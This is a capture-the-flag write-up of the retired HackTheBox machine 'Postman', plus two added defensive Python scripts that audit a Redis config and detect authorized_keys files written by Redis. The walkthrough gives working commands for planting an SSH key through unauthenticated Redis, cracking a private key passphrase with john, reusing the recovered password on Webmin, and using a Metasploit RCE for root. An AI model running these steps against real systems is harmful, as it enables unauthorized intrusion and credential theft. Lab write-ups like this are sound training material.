
HackTheBox - Retired - Postman


Recon:

As always, I start with a simple up/down scan on all TCP ports:
# nmap -T4 -p- -oX /root/Desktop/HTB/postman/nmapb.xml 10.10.10.160

Then I convert the XML to HTML:

xsltproc /root/Desktop/HTB/postman/nmapb.xml -o /root/Desktop/HTB/postman/nmapb.html


Ok, we see ports 22, 80, 6379 and 10000.

Let's scan just those ports with -A to fingerprint the OS and services:

nmap -T4 -A -p 22,80,6379,10000 -oX /root/Desktop/HTB/postman/nmapf.xml 10.10.10.160

Convert that to HTML too:

xsltproc /root/Desktop/HTB/postman/nmapf.xml -o /root/Desktop/HTB/postman/nmapf.html




Ok, we got SSH (OpenSSH 7.6p1) on port 22
HTTP (Apache 2.4.29) on port 80
Redis (4.0.9) on port 6379
Webmin (1.910) on port 10000

Let's see what's running on port 80


Just a generic page with not much to poke at.

Let's run dirb against port 80 and see what we see.

It found some directories to poke around in: /css, /fonts, /images, /js and /Uploads.

I really like finding directories called uploads; usually that means there is some way to upload a file to the server...



What about port 10000, Webmin?

It's running over SSL.

Needs creds...

Let's do a little digging on the Redis service. So what is Redis?


Redis is an open source (BSD licensed), in-memory data structure store, used as a database, cache and message broker.

It has a CLI.

Let's install it:

sudo apt-get install redis

Let's see if we can connect to it.

Cool, we can... so what can we do?
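Being able to connect at all, with no password, is the whole story here: Redis 4.x with protected-mode off, bound to a reachable interface and with no requirepass lets any client run CONFIG SET and SAVE. As an added example (not part of the original post) here is a small audit script that parses a redis.conf and flags exactly those settings, with a constructed weak config next to a hardened one. The configs are samples I wrote for the example, not the box's actual file; the directive names are real Redis directives.

```python
# Added example: audit a redis.conf for the settings that make the
# "write an arbitrary file with CONFIG SET dir/dbfilename + SAVE" trick possible.
# Both configs below are constructed samples, not taken from the target.
WEAK_CONF = """
# constructed sample: the kind of config that exposes Redis on the network
bind 0.0.0.0
protected-mode no
port 6379
dir /var/lib/redis
"""

HARDENED_CONF = """
# constructed sample: loopback only, auth required, CONFIG disabled
bind 127.0.0.1 ::1
protected-mode yes
port 6379
requirepass CHANGE-ME-to-a-long-random-secret
rename-command CONFIG ""
rename-command DEBUG ""
dir /var/lib/redis
"""


def parse_conf(text):
    """Map directive -> list of argument lists (repeated directives accumulate)."""
    conf = {}
    for raw in text.splitlines():
        line = raw.split("#", 1)[0].strip()   # drop comments and blank lines
        if not line:
            continue
        parts = line.split()
        conf.setdefault(parts[0].lower(), []).append(parts[1:])
    return conf


def audit_conf(text):
    """Return a list of human-readable findings; an empty list means no issue found."""
    conf = parse_conf(text)
    findings = []

    # No bind line means "all interfaces" in Redis, same as 0.0.0.0 / ::.
    binds = conf.get("bind", [[]])[-1]
    if not binds or any(b in ("0.0.0.0", "::", "*") for b in binds):
        findings.append("bind: listens on all interfaces")

    if conf.get("protected-mode", [["yes"]])[-1][0].lower() != "yes":
        findings.append("protected-mode: disabled")

    if "requirepass" not in conf:
        findings.append("requirepass: no password set, anyone who can connect is trusted")

    # rename-command CONFIG "" disables CONFIG entirely; renaming it to a secret
    # name is the weaker alternative. Either way it should not keep its default name.
    renamed = {v[0].upper() for v in conf.get("rename-command", []) if len(v) >= 2}
    if "CONFIG" not in renamed:
        findings.append("CONFIG command reachable under its default name (dir/dbfilename can be changed)")

    return findings


if __name__ == "__main__":
    for label, conf in (("weak", WEAK_CONF), ("hardened", HARDENED_CONF)):
        print(label + ":")
        for f in audit_conf(conf) or ["no findings"]:
            print("  - " + f)
```

To run it on a live host, read /etc/redis/redis.conf (the Debian/Ubuntu path) into audit_conf. Note that CONFIG SET at runtime can also change protected-mode and requirepass, so the file is only half the picture; the other half is confirming what the running instance answers to CONFIG GET.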





Exploit:



When I come across a tool I don't have any experience with, I like to google the tool's name followed by "pentest" to see what the juicy bits are.



Inserting our own SSH key onto the server to connect up...

Sounds worth a try.




Let's start by generating our SSH key pair (written to ./keyz and ./keyz.pub):

ssh-keygen -t rsa -f ./keyz



Now we are going to put some padding around the pub key, just like the blog does:
(echo -e "\n\n"; cat ./keyz.pub; echo -e "\n\n") > pubkey.txt

Now we need to move the file over to Redis:

cat ./pubkey.txt | redis-cli -h postman.htb -x set crackit

Connect back up to Redis to save our file:

redis-cli -h postman.htb

This part took a while: figuring out where to save the pub key.

When connected up we were in this directory:


/var/lib/redis

I tried setting the dir to /home... but got permission denied.

But what if this path is the home directory for a user named redis? If we add our file to .ssh there, maybe we can get our shell.
config set dir /var/lib/redis/.ssh
config set dbfilename "authorized_keys"
save

This should take the value we put in Redis and save it as a file named "authorized_keys" in the .ssh folder.
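The reason the padding matters is worth spelling out: SAVE writes an RDB dump, not a plain text file, so authorized_keys ends up as binary data (it starts with the RDB magic "REDIS" followed by the version) with our key somewhere in the middle. sshd parses authorized_keys line by line and ignores lines it cannot parse, so the newlines make sure the key sits on a line of its own. That same shape is what a defender can look for. As an added example (not from the original post), here is a check that inspects an authorized_keys file for that signature. The file contents below are a constructed stand-in that mimics the layout of such a dump; the key in it is fake, and a real RDB file carries more binary metadata than shown.

```python
# Added example: spot an authorized_keys file that was written by a Redis SAVE.
# RDB_AUTHORIZED_KEYS is a constructed sample, not a real dump.
import base64
import re

# Fake key: a valid-looking ssh-rsa line whose base64 body is just filler bytes.
FAKE_PUBKEY = (
    "ssh-rsa "
    + base64.b64encode(b"\x00\x00\x00\x07ssh-rsa" + b"\x01" * 40).decode()
    + " injected@example"
)

# Shape of the file after "config set dbfilename authorized_keys; save":
# RDB magic + version, binary aux fields and the key name, then the padded
# public key, then the trailing checksum bytes.
RDB_AUTHORIZED_KEYS = (
    b"REDIS0008\xfa\tredis-ver\x054.0.9\xfe\x00\xfb\x01\x00\x00\x07crackit\x5a"
    + b"\n\n\n" + FAKE_PUBKEY.encode() + b"\n\n\n"
    + b"\xff\x12\x34\x56\x78\x9a\xbc\xde\xf0"
)

# A line sshd would accept: key type followed by base64 (options prefixes not handled).
KEY_LINE = re.compile(rb"^(ssh-(rsa|ed25519|dss)|ecdsa-sha2-nistp\d+)\s+([A-Za-z0-9+/=]+)")


def inspect_authorized_keys(data):
    """Return which lines parse as keys, how many lines are junk, and whether
    the file starts with the RDB magic header."""
    findings = {"keys": [], "junk_lines": 0, "rdb_magic": data.startswith(b"REDIS")}
    for line in data.split(b"\n"):
        stripped = line.strip()
        if not stripped:
            continue   # blank lines are legal (and are exactly the padding)
        m = KEY_LINE.match(stripped)
        if m:
            try:
                base64.b64decode(m.group(3), validate=True)
                findings["keys"].append(stripped.decode("ascii", "replace")[:40])
                continue
            except ValueError:
                pass
        findings["junk_lines"] += 1   # sshd would skip it, but an editor never writes this
    return findings


def is_suspicious(findings):
    """A hand-maintained authorized_keys has no RDB magic and no unparseable lines."""
    return findings["rdb_magic"] or findings["junk_lines"] > 0


if __name__ == "__main__":
    print(inspect_authorized_keys(RDB_AUTHORIZED_KEYS))
    print("suspicious:", is_suspicious(inspect_authorized_keys(RDB_AUTHORIZED_KEYS)))
```

Run over /var/lib/redis/.ssh/authorized_keys (or any service account's authorized_keys) this flags the dump immediately; the stronger fix is the one the Redis config audit points at, since a service account that should never log in via SSH has no business having an authorized_keys file at all.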


Now we can hopefully SSH in as redis:
ssh -i ./keyz redis@postman.htb

Alright, we have a foothold as redis.

Let's copy over LinEnum.sh to see if we can find any path for escalation.



Check this out

A backup of a key in a folder we might have access to?





We got a private key... I just used the clipboard to copy it locally to my machine.
I changed the permissions so only my user can read it, so SSH wouldn't complain about it being too open.

I saved it as MattPriv.


There's a passphrase... no problem, we can get rid of that.

We can use ssh2john to convert the key into a format that john likes:

/usr/share/john/ssh2john.py ./MattPriv > johnmattpriv.txt


Now we just need to feed it to john:

sudo john --wordlist=/home/circusmonkey/rockyou.txt --format=SSH ./johnmattpriv.txt




That didn't take long: computer2008 is the passphrase for the SSH key.


It's not letting us SSH in with that password...


What about that Webmin thing we found earlier? It needed creds... hopefully Matt reuses passwords.

And guess what?

He did; got in with Matt / computer2008.


Googling around I found this authenticated RCE which, if it works, will give us root on the box.


Let's try it.

Fire up Metasploit and search for webmin.

use 3

Set our options.

We need to set the password, username, RHOSTS and LHOST, and set the SSL flag to true since our victim is using SSL. (You might see I mistyped the password option; I fixed that after Metasploit complained.)


We are in as root.

Let's just grab our flags now.


The shell is not working great.

I ran the command "shell" on the session to get a better shell.


All done

# pwd 
pwd
/home/Matt
# cat user.txt
cat user.txt
517a***************************
# cat /root/root.txt
cat /root/root.txt
a257*******************************
